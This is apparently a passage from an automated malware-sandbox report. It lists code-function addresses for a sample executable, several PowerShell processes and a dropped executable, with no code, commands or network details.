Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Code function: 0_2_02832309	0_2_02832309
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04E7B4A0	5_2_04E7B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04E7B490	5_2_04E7B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_02C81762	7_2_02C81762
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_02C8096D	7_2_02C8096D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_04BEB490	10_2_04BEB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_04BE167D	10_2_04BE167D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_04BE1044	10_2_04BE1044
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_08CC3E98	10_2_08CC3E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04401855	11_2_04401855
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_044015E5	11_2_044015E5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04401670	11_2_04401670
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04401364	11_2_04401364
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04B6B4A0	13_2_04B6B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04B6B490	13_2_04B6B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08B83A98	13_2_08B83A98
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043E893	14_2_0043E893
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C091	14_2_0040C091
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E0A1	14_2_0040E0A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00430141	14_2_00430141
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E161	14_2_0040E161
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00440101	14_2_00440101
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C111	14_2_0042C111
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C121	14_2_0040C121
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C1C1	14_2_0040C1C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004401C1	14_2_004401C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004121E1	14_2_004121E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A181	14_2_0040A181
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00430251	14_2_00430251
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C261	14_2_0040C261
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A221	14_2_0040A221
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C221	14_2_0042C221
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E231	14_2_0040E231
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004122A1	14_2_004122A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00412351	14_2_00412351
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E301	14_2_0040E301
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00430311	14_2_00430311
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00440311	14_2_00440311
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C321	14_2_0042C321
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A331	14_2_0040A331
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004103C1	14_2_004103C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C3C1	14_2_0042C3C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004123F1	14_2_004123F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E3F1	14_2_0040E3F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C381	14_2_0040C381
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A411	14_2_0040A411
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C421	14_2_0040C421
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004104D1	14_2_004104D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004404D1	14_2_004404D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004144E1	14_2_004144E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E4A1	14_2_0040E4A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004124B1	14_2_004124B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410571	14_2_00410571
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E571	14_2_0040E571
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C511	14_2_0042C511
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A521	14_2_0040A521
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C531	14_2_0040C531
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A5C1	14_2_0040A5C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E641	14_2_0040E641
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00440611	14_2_00440611
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410621	14_2_00410621
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C631	14_2_0040C631
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C6C1	14_2_0042C6C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004106D1	14_2_004106D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C6D1	14_2_0040C6D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A6B1	14_2_0040A6B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A771	14_2_0040A771
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00440701	14_2_00440701
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E711	14_2_0040E711
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004327C1	14_2_004327C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C781	14_2_0042C781
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004127A1	14_2_004127A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004107A1	14_2_004107A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00440811	14_2_00440811
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C821	14_2_0040C821
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A821	14_2_0040A821
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A8C1	14_2_0040A8C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C8D1	14_2_0042C8D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040E951	14_2_0040E951
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00440951	14_2_00440951
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040A961	14_2_0040A961
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040C971	14_2_0040C971
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042C9D1	14_2_0042C9D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004109F1	14_2_004109F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00412991	14_2_00412991
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408A41	14_2_00408A41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040AA71	14_2_0040AA71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040EA11	14_2_0040EA11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CA31	14_2_0040CA31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CAF1	14_2_0040CAF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042CAA1	14_2_0042CAA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410AB1	14_2_00410AB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00412AB1	14_2_00412AB1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042CB41	14_2_0042CB41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00432B51	14_2_00432B51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040AB61	14_2_0040AB61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408B01	14_2_00408B01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040EB01	14_2_0040EB01
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040EBC1	14_2_0040EBC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408BC1	14_2_00408BC1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CBF1	14_2_0040CBF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00412B81	14_2_00412B81
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410B91	14_2_00410B91
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00412C51	14_2_00412C51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040AC61	14_2_0040AC61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408CE1	14_2_00408CE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CD41	14_2_0040CD41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040AD51	14_2_0040AD51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00414D61	14_2_00414D61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042CD61	14_2_0042CD61
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408D71	14_2_00408D71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410D11	14_2_00410D11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040ED31	14_2_0040ED31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040EDD1	14_2_0040EDD1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040EE71	14_2_0040EE71
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040AE11	14_2_0040AE11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408E11	14_2_00408E11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CE31	14_2_0040CE31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410EA1	14_2_00410EA1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00410F41	14_2_00410F41
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040EF51	14_2_0040EF51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040AF51	14_2_0040AF51
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00408F11	14_2_00408F11
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CF31	14_2_0040CF31
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042CFE1	14_2_0042CFE1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040CFF1	14_2_0040CFF1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F051	14_2_0040F051
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411071	14_2_00411071
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409001	14_2_00409001
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B031	14_2_0040B031
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B0D1	14_2_0040B0D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004090E1	14_2_004090E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D091	14_2_0040D091
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411141	14_2_00411141
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042D171	14_2_0042D171
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F111	14_2_0043F111
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F121	14_2_0040F121
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443131	14_2_00443131
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F1D1	14_2_0040F1D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004431D1	14_2_004431D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042B1E1	14_2_0042B1E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409181	14_2_00409181
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D251	14_2_0040D251
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411231	14_2_00411231
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409231	14_2_00409231
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F2C1	14_2_0040F2C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004112D1	14_2_004112D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B2E1	14_2_0040B2E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443291	14_2_00443291
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409351	14_2_00409351
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443361	14_2_00443361
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B371	14_2_0040B371
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D301	14_2_0040D301
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F311	14_2_0043F311
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042B321	14_2_0042B321
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042D3C1	14_2_0042D3C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D3D1	14_2_0040D3D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413381	14_2_00413381
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F3B1	14_2_0040F3B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443431	14_2_00443431
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004434F1	14_2_004434F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F481	14_2_0043F481
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004094A1	14_2_004094A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B4A1	14_2_0040B4A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413561	14_2_00413561
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00409561	14_2_00409561
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D501	14_2_0040D501
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411511	14_2_00411511
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B5E1	14_2_0040B5E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F591	14_2_0040F591
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F591	14_2_0043F591
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443591	14_2_00443591
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D5B1	14_2_0040D5B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F651	14_2_0043F651
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443671	14_2_00443671
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413601	14_2_00413601
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411621	14_2_00411621
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F631	14_2_0040F631
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042D6C1	14_2_0042D6C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D6E1	14_2_0040D6E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F6F1	14_2_0043F6F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B681	14_2_0040B681
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042B691	14_2_0042B691
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004096B1	14_2_004096B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411741	14_2_00411741
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F741	14_2_0040F741
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443741	14_2_00443741
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413711	14_2_00413711
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B7C1	14_2_0040B7C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F7E1	14_2_0043F7E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004437E1	14_2_004437E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F7F1	14_2_0040F7F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004097B1	14_2_004097B1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D801	14_2_0040D801
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F8C1	14_2_0040F8C1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004098D1	14_2_004098D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F8D1	14_2_0043F8D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040B8E1	14_2_0040B8E1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D8F1	14_2_0040D8F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0042D8F1	14_2_0042D8F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411881	14_2_00411881
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004438A1	14_2_004438A1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00413961	14_2_00413961
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0043F971	14_2_0043F971
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004119D1	14_2_004119D1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004139F1	14_2_004139F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040D9F1	14_2_0040D9F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_004099F1	14_2_004099F1
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_0040F981	14_2_0040F981
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00443981	14_2_00443981
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Code function: 14_2_00411A71	14_2_00411A71
